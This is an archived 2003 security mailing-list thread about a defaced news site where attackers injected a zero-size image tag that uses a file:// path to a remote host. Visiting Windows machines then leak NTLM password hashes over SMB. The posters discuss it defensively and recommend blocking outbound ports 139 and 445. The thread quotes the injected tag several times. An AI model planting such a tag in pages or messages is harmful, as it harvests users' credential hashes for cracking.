Hello,

What happens if you're in an Active Directory/Kerberos environment? Will it revert to sending the hash for NTLM auth or will it just try to obtain a ticket for the resource? Or, am I completely barking up the wrong tree on this? :) I seem to remember that it will revert, but was wondering if anyone knew for sure.

Thanks in advance.

-Barry

Stark, Vernon L. wrote:

> A host that encounters content such as <img src=file://korean_ip_address/test.jpg height=0 width=0> simply tries to contact the single host korean_ip_address. It does not try to do a DDOS. If ports 139 and 445 are not blocked outbound, the impact is that the host will create a connection with the Korean host and attempt to authenticate. This authentication includes providing password hashes to the remote host.
>
> What we've seen is a news site that repeatedly gets defaced. The defacement consists of simply adding the content listed above. When users are browsing the web and encounter this news site, their hosts attempt to call Korea. The packets all have the same destination IP address (the Korean host) and their only intent is to establish a connection with the Korean host. There is no intent to do a DOS. So, blocking outbound TCP 139 and 445 keeps your password hashes from being transmitted to Korea where they might be cracked and used for gaining access to your network. The content simply provides a way to harvest password hashes.
>
> By the way, I've also seen this content in an e-mail message. Yes, when the user opened the e-mail, his host started attempting to contact the IP address listed in the offending content.
>
> Vern
>
> -----Original Message-----
> From: Jack Lyons [mailto:jack.lyonsat_private]
> Sent: Tuesday, July 22, 2003 12:39 PM
> To: 'Stark, Vernon L.'; 'incidentsat_private'
> Subject: RE: Importance of outbound traffic filtering
>
> I block those ports and others outbound, but it would only stop a DDOS attack against people who left those ports open inbound - correct?
>
>> -----Original Message-----
>> From: Stark, Vernon L. [mailto:Vern.Starkat_private]
>> Sent: Friday, July 18, 2003 10:13 AM
>> To: 'incidentsat_private'
>> Subject: Importance of outbound traffic filtering
>>
>> For the third time since May 5th, a site which provides news about department of defense issues has apparently been defaced. The hack is described in Ed Skoudis's excellent book entitled "Counter Hack" (pages 289-290). The hack we noticed today is a web page with content of the form
>>
>> <img src=file://korean_ip_address/test.jpg height=0 width=0>
>>
>> If outbound traffic to TCP ports 139 and 445 is NOT blocked, Windows hosts will attempt to send password hashes to the remote host. Hosts may attempt to contact the remote host on other ports (e.g. 80) as well. This clearly illustrates the importance of outbound traffic filtering.
>>
>> Vern Stark, GCIA, GSEC
>>
>> JHU/APL
This archive was generated by hypermail 2b30 : Thu Jul 31 2003 - 07:45:38 PDT